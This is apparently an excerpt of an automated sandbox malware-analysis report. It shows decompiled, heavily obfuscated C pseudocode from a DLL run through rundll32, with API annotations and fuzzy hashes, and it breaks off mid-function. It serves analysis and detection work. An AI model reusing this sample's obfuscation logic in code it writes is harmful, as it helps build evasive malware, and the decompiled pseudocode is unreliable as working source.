                				_t406 =  *(__r9 + 0x2a8) ^ 0x00002111;
                				r9d =  *( *((intOrPtr*)(__r9 + 0x5e8)) + 0x1b0);
                				r9d = r9d ^ 0x00001fda;
                				r11d =  *((intOrPtr*)(_t401 + 0x88 + _t406 * 8));
                				_t392 = __r11 +  *((intOrPtr*)(__r9 + 0xe8));
                				 *((long long*)(_t380 + 0x50)) = _t392;
                				 *( *((intOrPtr*)(__r9 + 0x240)) + 0x128) =  *( *((intOrPtr*)(__r9 + 0x20)) + 0x238) ^ 0x0000157a;
                				if (r9d -  *((intOrPtr*)(_t401 + 0x8c + _t406 * 8)) >= 0) goto 0x535f5f22;
                				r8d = r9d;
                				_t383 = __r8 + _t392;
                				 *((long long*)(_t380 + 0x58)) = _t383;
                				 *( *((intOrPtr*)(__r9 + 0x160)) + 0x128) =  *( *((intOrPtr*)(__r9 + 0x160)) + 0x128) |  *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x240)) + 0x3a0)) - 0x000015fd;
                				_t363 =  *((intOrPtr*)(__r9 + 0x20));
                				 *(_t363 + 0x248) =  *(_t363 + 0x248) ^  *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x5e8)) + 0x3c0)) + 0x00001515;
                				r8d =  *(_t383 + 4);
                				r9d = r9d +  *((intOrPtr*)( *(__r9 + 0x110) + 0x148)) + 0xffffecb3;
                				_t385 = _t383 -  *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x358)) + 0x68)) + 0x157a;
                				 *( *((intOrPtr*)(__r9 + 0x20)) + 0x478) =  *( *((intOrPtr*)(__r9 + 0x20)) + 0x478) & 0x00000000;
                				 *( *((intOrPtr*)(__r9 + 0x20)) + 0x140) =  *( *((intOrPtr*)(__r9 + 0x20)) + 0x140) ^  *((intOrPtr*)(__r9 + 0x130)) - 0x00000651;
                				_t228 =  *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x5e8)) + 0x68)) - 0x1582;
                				_t261 = _t228 - r8d;
                				if (_t261 >= 0) goto 0x535f5e26;
                				r8d = r8d - _t228;
                				r12d = r8d;
                				_t393 = _t363 + _t392 + _t228 * 2;
                				 *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x20)) + 0x188)) =  *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x20)) + 0x188)) +  *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x160)) + 0x110)) - 0x1569;
                				 *( *(__r9 + 0x110) + 0x168) =  *( *((intOrPtr*)(__r9 + 0x240)) + 0x108) | 0x00000c92;
                				r8d =  *_t393 & 0x0000ffff;
                				r8d = r8d & 0x00000fff;
                				r8d = r8d +  *((intOrPtr*)( *((intOrPtr*)(_t380 + 0x58))));
                				r9d = r9d + ( *( *((intOrPtr*)(__r9 + 0x2a0)) + 0x70) ^ 0x00001485);
                				 *( *((intOrPtr*)(__r9 + 0x5e8)) + 0x138) =  *( *((intOrPtr*)(__r9 + 0x5e8)) + 0x2e8) ^ 0x00001ba7;
                				if (_t261 == 0) goto 0x535f5db3;
                				if (_t261 == 0) goto 0x535f5d6f;
                				if (_t261 == 0) goto 0x535f5d26;
                				_t262 = (( *_t393 & 0x0000ffff) >> 0xc) - 0xffffffffffffffff - 7;
                				if (_t262 != 0) goto 0x535f5dde;
                				 *((intOrPtr*)( *(__r9 + 0x110) + 0x248)) =  *((intOrPtr*)( *(__r9 + 0x110) + 0x248)) + ( *( *((intOrPtr*)(__r9 + 0x20)) + 0x48) ^ 0x000016ce);
                				 *( *(__r9 + 0x110) + 0x90) =  *( *(__r9 + 0x110) + 0x90) |  *( *((intOrPtr*)(__r9 + 0x2a0)) + 0x490) ^ 0x00000bbb;
                				goto 0x535f5dd3;
                				 *((long long*)( *((intOrPtr*)(__r9 + 0x160)) + 0x3d0)) =  *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x160)) + 0x28)) + 0x10ae;
                				 *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x2a0)) + 0x248)) =  *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x2a0)) + 0x248)) + ( *( *(__r9 + 0x108) + 0x248) ^ 0x00001569);
                				goto 0x535f5dd3;
                				_t301 =  *((intOrPtr*)(__r9 + 0x5e8));
                				 *((intOrPtr*)(__r9 + 0x80)) =  *((intOrPtr*)(__r9 + 0x80)) -  *(_t301 + 0x390) * 0x181f;
                				 *((intOrPtr*)(_t385 +  *((intOrPtr*)(__r9 + 0xe8)))) =  *((intOrPtr*)(_t385 +  *((intOrPtr*)(__r9 + 0xe8)))) + _t301;
                				 *( *((intOrPtr*)(__r9 + 0x358)) + 0x438) =  *( *((intOrPtr*)(__r9 + 0x358)) + 0x438) ^ 0x00003234;
                				 *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x358)) + 0x390)) =  *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x358)) + 0x390)) + 0xffffef52 -  *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x160)) + 0xa8));
                				if (_t262 != 0) goto 0x535f5c84;
                				 *( *(__r9 + 0x110) + 0x1a8) =  *( *(__r9 + 0x110) + 0x1a8) |  *( *((intOrPtr*)(__r9 + 0x240)) + 0x128);
                				 *( *((intOrPtr*)(__r9 + 0x240)) + 0x128) =  *( *((intOrPtr*)(__r9 + 0x240)) + 0x128) - 1;
                				 *((long long*)( *((intOrPtr*)(__r9 + 0x240)) + 0x3d0)) = 0x1d7f;
                				if (r9d -  *((intOrPtr*)(_t401 + 0x8c + _t406 * 8)) < 0) goto 0x535f5b98;
                				goto 0x535f5f1b;
                				_t402 = r8d;
                				if ( *((intOrPtr*)(__r9 + 0xc8)) - ( *(__r9 + 0x110) | _t402) * 0x1355 >= 0) goto 0x535f5f2a;
                				_t220 = r12d * r8d;
                				r12d = _t251;
                				if (_t251 - _t220 <= 0) goto 0x535f5eed;
                				r8d =  *(__r9 + 0x108);
                				r8d = r8d |  *(_t380 + 0xc8);
                				SetFileAttributesA(_t409);
                				r12d = r12d + 4;
                				if (r12d - _t220 > 0) goto 0x535f5eb8;
                				r14d = r14d + 3;
                				if (r14d - ( *(__r9 + 0x110) | _t402) * 0x1355 < 0) goto 0x535f5ea7;
                				r10d =  *(_t380 + 0xf8);
                				r15d =  *((intOrPtr*)(_t380 + 0x58));
                				r11d =  *((intOrPtr*)(_t380 + 0xa8));
                				r8d =  *(_t380 + 0x108);
                				if (r15d - _t385 - 0x3d9 <= 0) goto 0x535f602c;
                				 *((long long*)(__r9 + 0x1b8)) =  *((intOrPtr*)(__r9 + 0xb8));
                				 *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x358)) + 0x198)) =  *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x358)) + 0x198)) - ( *( *(__r9 + 0x108) + 0x248) | 0x00000651);
                				 *( *(__r9 + 0x108) + 0x198) =  *( *(__r9 + 0x108) + 0x198) * ( *( *((intOrPtr*)(__r9 + 0x240)) + 0x398) | 0x0000181f);
                				r8d = 0x1b47;
                				 *((long long*)( *((intOrPtr*)(__r9 + 0x5e8)) + 0x338)) =  *((long long*)( *((intOrPtr*)(__r9 + 0x5e8)) + 0x338)) + 0xffffe7be;
                				E00007FFA7FFA535FAF30(0x11f1,  *((intOrPtr*)(_t380 + 0x58)),  *((intOrPtr*)(__r9 + 0x358)), __rsi, _t377, __r9);
                				_t190 = _t373 + 0x204; // 0x204
                				 *((intOrPtr*)(__r9 + 0x400)) =  *(__r9 + 0x2a8) + 0xffffdf13;
                				_t213 = E00007FFA7FFA535E3F50( *(__r9 + 0x2a8) + 0xffffdf13, 0x11f1, 0, _t249, _t255, _t190, __r9,  *(__r9 + 0x2a8) + 0xffffdf13);
                				_t193 = _t373 + 0x258; // 0x258
                				E00007FFA7FFA535E3F50(_t213, 0x11f1, 0, _t249, _t255, _t193, _t373,  *((intOrPtr*)(_t373 + 0x400)));
                				return  *((intOrPtr*)(_t380 + 0xc0)) + 0x1515;
                			}

                APIs
                • SetFileAttributesA.KERNEL32(?,?,?,?,?,?,?,?,00000651,FFFFE791,00000000,?,?,00007FFA535E1FB9), ref: 00007FFA535F5ED7
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: AttributesFile
                • String ID:
                • API String ID: 3188754299-0
                • Opcode ID: 6b0a8843299c2e86402d5fd0ebcadc2bbfed71392822bb86e31921b7a36e54c3
                • Instruction ID: 7310299deb443c087b19cebb6579f40d15bf9f590e184c460fe133706274a8da
                • Opcode Fuzzy Hash: 6b0a8843299c2e86402d5fd0ebcadc2bbfed71392822bb86e31921b7a36e54c3
                • Instruction Fuzzy Hash: 7D1264B2314B859BDB68CB29D5847E9B7A9F788B84F049126DB9D43750DF38E5A0CB00
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 94%
                			E00007FFA7FFA535F615C(void* __eax, void* __ebx, long long __rbx, void* __rcx, long long __rdx, void* __r8, void* __r9) {
                				void* __rsi;
                				void* __rbp;
                				signed int _t148;
                				signed int _t152;
                				signed int _t156;
                				intOrPtr _t159;
                				signed long long _t163;
                				signed int _t164;
                				void* _t181;
                				long long _t202;
                				signed long long _t220;
                				void* _t229;
                				void* _t231;
                				void* _t233;
                				void* _t235;
                				void* _t236;
                				long long* _t241;
                				void* _t245;
                				void* _t249;
                
                				_t202 = __rbx;
                				 *((long long*)(_t235 + 0x10)) = __rbx;
                				_push(_t233);
                				_push(_t231);
                				_push(_t229);
                				_push(_t245);
                				_t236 = _t235 - 0x90;
                				r11d = __r8 - 0x9c7;
                				r10d =  *(_t236 + 0xf8);
                				 *(_t236 + 0xe8) =  *(_t236 + 0x110) + 0xffffee0f;
                				 *(_t236 + 0xf8) = r11d;
                				r9d =  *(_t236 + 0xf0);
                				r14d = _t181 - 0x2dd;
                				_t148 = _t181 + 0xd1;
                				 *(_t236 + 0xd0) = __r9 - 0x157a;
                				 *(_t236 + 0x110) = r14d;
                				r10d = r10d + 0xfffffed1;
                				 *(_t236 + 0x108) = _t148;
                				_t159 = __r9 - 0x8e8;
                				 *((intOrPtr*)(_t236 + 0x80)) = _t159;
                				_t164 = __r9 + 0x154;
                				 *(_t236 + 0xe0) = _t164;
                				r9d = __r8 - 0x1582;
                				 *(_t236 + 0xf0) = r9d;
                				if (_t159 == _t233 + 0x2114) goto 0x535f654b;
                				if (r9d - __rdx + 0x145c >= 0) goto 0x535f6323;
                				_t241 = __rdx + 0x620;
                				 *(_t236 + 0x30) =  *(_t236 + 0x30) & 0x00000000;
                				 *(__rdx + 0x128) = 0x19f;
                				 *(_t236 + 0x28) = 0x8000000;
                				 *( *((intOrPtr*)(__rdx + 0x5e8)) + 0x140) =  *( *((intOrPtr*)(__rdx + 0x5e8)) + 0x140) |  *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x5e8)) + 0x3b8)) + 0x00001ec0;
                				 *(__rdx + 0x38c) =  *(__rdx + 0x38c) & 0x00000000;
                				 *((intOrPtr*)(__rdx + 0x388)) =  *((intOrPtr*)(__rdx + 0x348));
                				 *((long long*)(__rdx + 0xf8)) =  *((intOrPtr*)( *((intOrPtr*)(__rdx + 0xb8)) + 0x3c)) +  *((intOrPtr*)(__rdx + 0xb8));
                				 *((long long*)(__rdx + 0x3b0)) =  *((intOrPtr*)(__rdx + 0x288));
                				 *_t241 =  *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x5e8)) + 0x70)) - 0x1487;
                				 *((long long*)( *((intOrPtr*)(__rdx + 0x20)) + 0x3a0)) =  *((long long*)( *((intOrPtr*)(__rdx + 0x20)) + 0x3a0)) + 0xca2;
                				r8d =  *( *((intOrPtr*)(__rdx + 0x20)) + 0x1b0);
                				r8d = r8d - 0x1f9a;
                				 *(_t236 + 0x20) = r8d;
                				r8d = 0;
                				_t152 =  *( *((intOrPtr*)(__rdx + 0x5e8)) + 0x148) ^ 0x0000135b;
                				 *((intOrPtr*)(__rdx + 0x404)) =  *((intOrPtr*)(__rdx + 0x3b0))();
                				goto 0x535f650b;
                				if ( *(__rdx + 0x2a8) != _t152 -  *((intOrPtr*)(__rdx + 0x368))) goto 0x535f650b;
                				if (_t152 - r9d - _t148 + __rcx - 0x89a + 0x9c9 > 0) goto 0x535f637b;
                				DisconnectNamedPipe(_t249);
                				_t156 =  *(_t236 + 0xd0);
                				r9d =  *(_t236 + 0xf0);
                				r11d =  *(_t236 + 0xf8);
                				if ( *((intOrPtr*)(__rdx + 0x188)) != ( *((intOrPtr*)(__rdx + 0x1d0)) + _t164) * 0x1320) goto 0x535f650b;
                				r13d =  *((intOrPtr*)(__rdx + 0x230));
                				r11d = r11d & 0x00001582;
                				r8d =  *(__rdx + 0x248);
                				r10d =  *(__rdx + 0x3b8);
                				r8d = r8d | r14d;
                				r10d = r10d - 0x1ad7;
                				r15d =  *(__rdx + 0x28);
                				r15d = r15d & r9d;
                				r13d = r13d -  *(__rdx + 0xa0);
                				r13d = r13d + _t156;
                				r8d = r8d ^ 0x00000651;
                				r14d = ( *(__rdx + 0x318) ^  *(__rdx + 0x240)) * 0x11f1;
                				 *(_t236 + 0xf8) = r11d;
                				r11d = r9d;
                				r9d = r9d *  *(_t236 + 0x110);
                				r11d = r11d & 0x00002114;
                				 *((intOrPtr*)(_t236 + 0x78)) =  *(_t236 + 0x110) * _t156 + 0x1320;
                				 *(_t236 + 0x70) = r10d;
                				 *(_t236 + 0x68) =  *(__rdx + 0x80) ^  *(_t236 + 0xe0);
                				 *(_t236 + 0x60) =  *(_t236 + 0xf8);
                				 *(_t236 + 0x58) =  *(__rdx + 0x2a8) + 0x00000932 & 0x000012ad;
                				 *((intOrPtr*)(_t236 + 0x50)) =  *((intOrPtr*)(__rdx + 0x440)) - 0x651;
                				 *((long long*)(_t236 + 0x48)) = __rdx;
                				 *(_t236 + 0x40) =  *(__rdx + 0x40) &  *(_t236 + 0x108);
                				 *((intOrPtr*)(_t236 + 0x38)) = r13d;
                				 *(_t236 + 0xf0) = r9d;
                				r9d = _t156 | 0x00001ba7;
                				 *(_t236 + 0x30) = r14d;
                				 *(_t236 + 0x28) = r15d;
                				 *(_t236 + 0x20) = r11d;
                				E00007FFA7FFA535F9404( *(_t236 + 0xf8),  *(__rdx + 0x80) ^  *(_t236 + 0xe0), _t245 + 0x145c,  *(_t236 + 0xf0),  *((intOrPtr*)(__rdx + 0x440)) - 0x651,  *(__rdx + 0x40) &  *(_t236 + 0x108), __rbx, __rdx, _t231, __r8, _t241);
                				_t163 =  *((intOrPtr*)(_t236 + 0x80));
                				 *(__rdx + 0x2a0) =  *(__rdx + 0x2a0) * (( *(__rdx + 0x58) &  *(_t236 + 0xe8)) + 0x651);
                				 *(__rdx + 0x2d0) =  *(__rdx + 0x5d8) ^ 0x00000bbb;
                				_t102 = _t202 - 0x1625; // -5669
                				if (_t163 - _t102 < 0) goto 0x535f65b2;
                				if ( *((intOrPtr*)(__rdx + 0x404)) == 0) goto 0x535f65b2;
                				 *( *((intOrPtr*)(__rdx + 0x358)) + 0x5e0) =  *( *((intOrPtr*)(__rdx + 0x20)) + 0x390) * 0x1ad7;
                				goto 0x535f65b8;
                				_t220 = _t163;
                				if ( *((intOrPtr*)(__rdx + 0x2f8)) - ( *(__rdx + 0x128) ^ _t220) + 0x145c <= 0) goto 0x535f65b2;
                				if ( *((intOrPtr*)(__rdx + 0x110)) - ( *(__rdx + 0x2a0) | _t220) <= 0) goto 0x535f65b2;
                				 *(__rdx + 0x3b8) =  *(__rdx + 0x3b8) ^ _t241 + 0x00001582 +  *((intOrPtr*)(__rdx + 0x298));
                				 *(__rdx + 0xa0) =  *(__rdx + 0xa0) |  *(__rdx + 0x2a8) * 0x000011f1 ^ r11d;
                				return _t229 + 0x68e;
                			}























                APIs
                • DisconnectNamedPipe.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FFA535F635E
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: DisconnectNamedPipe
                • String ID:
                • API String ID: 797972925-0
                • Opcode ID: 17d992a7432668e4eb444aa07ec58e46677ea7302fb7bbe7f68e0d605f58bee4
                • Instruction ID: 47890ce1e09b5a669ff8df59b86377a81bb2d4d389a92553468a53c5b71d6706
                • Opcode Fuzzy Hash: 17d992a7432668e4eb444aa07ec58e46677ea7302fb7bbe7f68e0d605f58bee4
                • Instruction Fuzzy Hash: 7AB16273614AD58AD764CF14E088FEE77A9F388788F024126DB8A57B54EB38D598CB04
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 55%
                			E00007FFA7FFA535E79EC(long long __rbx, signed long long*** __rcx, long long __rdi, signed long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
                				void* _t28;
                				signed int _t56;
                				void* _t57;
                				void* _t59;
                				void* _t70;
                				signed long long _t71;
                				void* _t76;
                				signed int* _t82;
                				signed long long _t84;
                				signed long long _t86;
                				signed long long _t87;
                				signed long long _t103;
                				signed long long _t104;
                				signed long long _t106;
                				signed long long _t112;
                				signed long long _t114;
                				void* _t123;
                				signed long long _t126;
                				signed long long _t127;
                				signed long long _t128;
                				signed long long* _t133;
                				void* _t134;
                				signed long long _t138;
                				signed long long*** _t141;
                
                				_t114 = __rsi;
                				_t70 = _t123;
                				 *((long long*)(_t70 + 8)) = __rbx;
                				 *((long long*)(_t70 + 0x10)) = __rbp;
                				 *((long long*)(_t70 + 0x18)) = __rsi;
                				 *((long long*)(_t70 + 0x20)) = __rdi;
                				_push(_t134);
                				_t71 =  *((intOrPtr*)(__rcx));
                				_t141 = __rcx;
                				_t82 =  *_t71;
                				if (_t82 != 0) goto 0x535e7a21;
                				goto 0x535e7ba7;
                				_t126 =  *0x53754140; // 0x9bd95a2971b4
                				r12d = 0x40;
                				_t119 =  *_t82 ^ _t126;
                				asm("dec eax");
                				_t84 = _t82[4] ^ _t126;
                				asm("dec ecx");
                				asm("dec eax");
                				if ((_t82[2] ^ _t126) != _t84) goto 0x535e7b21;
                				_t86 = _t84 - ( *_t82 ^ _t126) >> 3;
                				_t109 =  >  ? _t71 : _t86;
                				_t110 = ( >  ? _t71 : _t86) + _t86;
                				_t111 =  ==  ? _t71 : ( >  ? _t71 : _t86) + _t86;
                				if (( ==  ? _t71 : ( >  ? _t71 : _t86) + _t86) - _t86 < 0) goto 0x535e7aa0;
                				r8d = _t134 - 0x38;
                				E00007FFA7FFA535EF334(_t134 - 0x20, r8d & 0x0000003f, _t57, _t59, _t86, _t119,  ==  ? _t71 : ( >  ? _t71 : _t86) + _t86, __rsi, _t119, _t126);
                				_t28 = E00007FFA7FFA535E7E58(_t71, _t119);
                				if (_t71 != 0) goto 0x535e7ac8;
                				_t112 = _t86 + 4;
                				r8d = 8;
                				E00007FFA7FFA535EF334(_t28, 0, _t57, _t59, _t86, _t119, _t112, _t114, _t119, _t126);
                				_t138 = _t71;
                				E00007FFA7FFA535E7E58(_t71, _t119);
                				if (_t138 == 0) goto 0x535e7a19;
                				_t127 =  *0x53754140; // 0x9bd95a2971b4
                				_t133 = _t138 + _t86 * 8;
                				_t87 = _t138 + _t112 * 8;
                				asm("dec eax");
                				_t76 =  >  ? _t114 : _t87 - _t133 + 7 >> 3;
                				if (_t76 == 0) goto 0x535e7b21;
                				 *_t133 = _t114 ^ _t127;
                				if (_t114 + 1 != _t76) goto 0x535e7b0b;
                				_t128 =  *0x53754140; // 0x9bd95a2971b4
                				asm("dec eax");
                				 *_t133 =  *(_t141[1]) ^ _t128;
                				_t103 =  *0x53754140; // 0x9bd95a2971b4
                				asm("dec eax");
                				 *( *( *_t141)) = _t138 ^ _t103;
                				_t104 =  *0x53754140; // 0x9bd95a2971b4
                				asm("dec ecx");
                				( *( *_t141))[1] =  &(_t133[1]) ^ _t104;
                				_t106 =  *0x53754140; // 0x9bd95a2971b4
                				r12d = r12d - (_t56 & 0x0000003f);
                				asm("dec eax");
                				( *( *_t141))[2] = _t87 ^ _t106;
                				return 0;
                			}




























                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID:
                • String ID: @
                • API String ID: 0-2766056989
                • Opcode ID: 346c1b88be02117be7f8758ca781b98ccd176a27ae5bec0610294ea7b2f87f69
                • Instruction ID: 2c46296e4e1b5cc163ff478d42538fcc9473e764801508986ddf6f8428a528ef
                • Opcode Fuzzy Hash: 346c1b88be02117be7f8758ca781b98ccd176a27ae5bec0610294ea7b2f87f69
                • Instruction Fuzzy Hash: 7C41B262B25F448AEA08CF2AE4141A967A6BB99FC0B4DE036DE0D97754EE3CD442C300
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00007FFA7FFA535EF3D4(long long __rax) {
                				signed int _t3;
                
                				_t3 = GetProcessHeap();
                				 *0x53755748 = __rax;
                				return _t3 & 0xffffff00 | __rax != 0x00000000;
                			}




                0x7ffa535ef3d8
                0x7ffa535ef3e1
                0x7ffa535ef3ef

                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: HeapProcess
                • String ID:
                • API String ID: 54951025-0
                • Opcode ID: 09493c902aeff8137d99b67d99ae24fca8f81e13b04488db06bc56ce794d1363
                • Instruction ID: 0cfb4fbe83daadb556de3732b62e142eb54f42bf669103b4c5501ce449a3232d
                • Opcode Fuzzy Hash: 09493c902aeff8137d99b67d99ae24fca8f81e13b04488db06bc56ce794d1363
                • Instruction Fuzzy Hash: 68B09220E27F06C7EA086B156C8261822AAAF99710F9C9478C00DA0320DE2C20EA9700
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00007FFA7FFA535FAA40(void* __eax, void* __edx, void* __ebp, void* __rcx, void* __rdx, void* __r8, void* __r9, void* __r10, void* __r11) {
                				void* __rbx;
                				void* __rsi;
                				void* __rbp;
                				signed int _t147;
                				signed int _t156;
                				signed int _t170;
                				signed int _t173;
                				signed int _t177;
                				signed int _t180;
                				signed int _t183;
                				intOrPtr _t200;
                				long long _t201;
                				signed long long _t206;
                				signed long long _t219;
                				signed long long _t223;
                				void* _t227;
                				intOrPtr _t229;
                				long long _t235;
                				signed long long _t245;
                				signed long long _t248;
                				void* _t257;
                				void* _t258;
                				intOrPtr _t260;
                				intOrPtr _t261;
                				void* _t268;
                
                				_t268 = __r11;
                				r10d =  *(_t258 + 0x128);
                				r14d = __r8 - 0x12ad;
                				r8d =  *(_t258 + 0x148);
                				r15d = __rcx + 0x1a1;
                				r10d = r10d + 0xffffece0;
                				_t170 = __edx + 0xffffeaeb;
                				_t156 =  *(_t258 + 0x140) + 0xfffff567;
                				r9d = r9d + 0xfffff57b;
                				 *(_t258 + 0x84) = r10d;
                				_t183 =  *(_t258 + 0x160) + 0xffffea86;
                				 *(_t258 + 0x100) = r14d;
                				_t177 = __r8 - 0x68e;
                				 *(_t258 + 0xf8) = _t170;
                				_t173 = __r8 - 0x1320;
                				 *(_t258 + 0x108) = _t177;
                				r11d = __r8 - 0x73;
                				 *(_t258 + 0xf0) = _t173;
                				_t260 =  *((intOrPtr*)(_t258 + 0x158));
                				 *((intOrPtr*)(_t258 + 0x88)) = r11d;
                				 *(_t258 + 0x148) = _t156;
                				 *(_t258 + 0x128) = r9d;
                				 *(_t258 + 0x80) = r15d;
                				 *(_t258 + 0x140) = _t183;
                				if (r14d ==  *(_t258 + 0x168) + 0xffffe464) goto 0x535fadcf;
                				if (_t156 == __r9 + 0x12f) goto 0x535fabcd;
                				_t200 =  *((intOrPtr*)(_t260 + 0x498));
                				if (_t200 != 0) goto 0x535fab3c;
                				goto 0x535faf0b;
                				_t201 = _t200 + 0xc130;
                				r10d = r10d + 0x16ce;
                				 *((long long*)(_t260 + 0x4c0)) = _t201;
                				if (_t201 != 0xffffffff) goto 0x535fab74;
                				_t229 =  *((intOrPtr*)(_t260 + 0x110));
                				 *((intOrPtr*)(_t260 + 0x138)) =  *((intOrPtr*)(_t260 + 0x138)) -  *((intOrPtr*)(_t229 + 0x3b8));
                				 *((long long*)(_t229 + 0x3b8)) =  *((long long*)(_t229 + 0x3b8)) - 1;
                				goto 0x535fab35;
                				 *((char*)(_t260 + 0x4c8)) = 0;
                				 *(_t260 + 0x188) = 0x1bbf;
                				 *(_t260 + 0x158) =  *(_t260 + 0x158) |  *( *((intOrPtr*)(_t260 + 0x358)) + 0xa0) | 0x00001c76;
                				 *(_t260 + 0x5f0) =  *(_t260 + 0x5f0) & 0x00000000;
                				 *((intOrPtr*)( *((intOrPtr*)(_t260 + 0x20)) + 0x130)) =  *((intOrPtr*)( *((intOrPtr*)(_t260 + 0x20)) + 0x130)) +  *((intOrPtr*)( *((intOrPtr*)(_t260 + 0x20)) + 0x168));
                				 *((long long*)( *((intOrPtr*)(_t260 + 0x20)) + 0x168)) =  *((long long*)( *((intOrPtr*)(_t260 + 0x20)) + 0x168)) + 1;
                				goto 0x535fadcf;
                				_t206 = _t170;
                				r9d = r10d;
                				 *(_t258 + 0x90) = _t206;
                				 *(_t258 + 0x160) = r10d;
                				if (r10d - (_t206 ^  *(_t260 + 0x3a0)) > 0) goto 0x535fadc7;
                				_t235 = _t170 * 0x2114;
                				 *((long long*)(_t258 + 0x98)) = _t235;
                				if ( *((intOrPtr*)(_t260 + 0x110)) - _t235 < 0) goto 0x535fad87;
                				r14d =  *(_t260 + 0x178) * 0x1ba7;
                				r13d =  *(_t260 + 0x2a8);
                				r11d = __rdx + 0x11f1;
                				r12d = _t177;
                				 *(_t260 + 0x148) =  *(_t260 + 0x148) |  *(_t260 + 0x248) * 0x000012ad ^  *(_t260 + 0x2a0);
                				r13d = r13d ^  *(_t260 + 0x188);
                				r13d = r13d + _t183;
                				r14d = r14d + _t173;
                				r9d =  *(_t260 + 0x190);
                				r12d = r12d -  *((intOrPtr*)(_t260 + 0x230));
                				r10d =  *(_t258 + 0x140);
                				r10d = r10d ^  *(_t258 + 0x148);
                				 *(_t258 + 0x78) = r10d;
                				 *((intOrPtr*)(_t258 + 0x70)) =  *((intOrPtr*)(_t260 + 0x4b8)) +  *((intOrPtr*)(_t260 + 0x108));
                				 *((intOrPtr*)(_t258 + 0x68)) =  *((intOrPtr*)(_t260 + 0x110)) + 0x2114;
                				 *((intOrPtr*)(_t258 + 0x60)) = r11d;
                				 *(_t258 + 0x168) =  *(_t260 + 0x128) ^ _t156;
                				 *(_t258 + 0x58) =  *(_t260 + 0x3c8) *  *(_t260 + 0xd8) & _t173;
                				 *(_t258 + 0x50) = r14d;
                				r9d = r9d * r15d;
                				r15d = _t170;
                				r15d = r15d -  *(_t260 + 0x2a0);
                				r8d =  *(_t258 + 0xf0);
                				r8d = r8d - _t170;
                				 *((long long*)(_t258 + 0x48)) =  *((intOrPtr*)(_t258 + 0x158));
                				 *(_t258 + 0x40) = r15d;
                				 *(_t258 + 0x38) = r12d;
                				 *(_t258 + 0x30) = r13d;
                				 *(_t258 + 0x28) =  *(_t260 + 0x420) * _t170 ^  *(_t260 + 0x3b8);
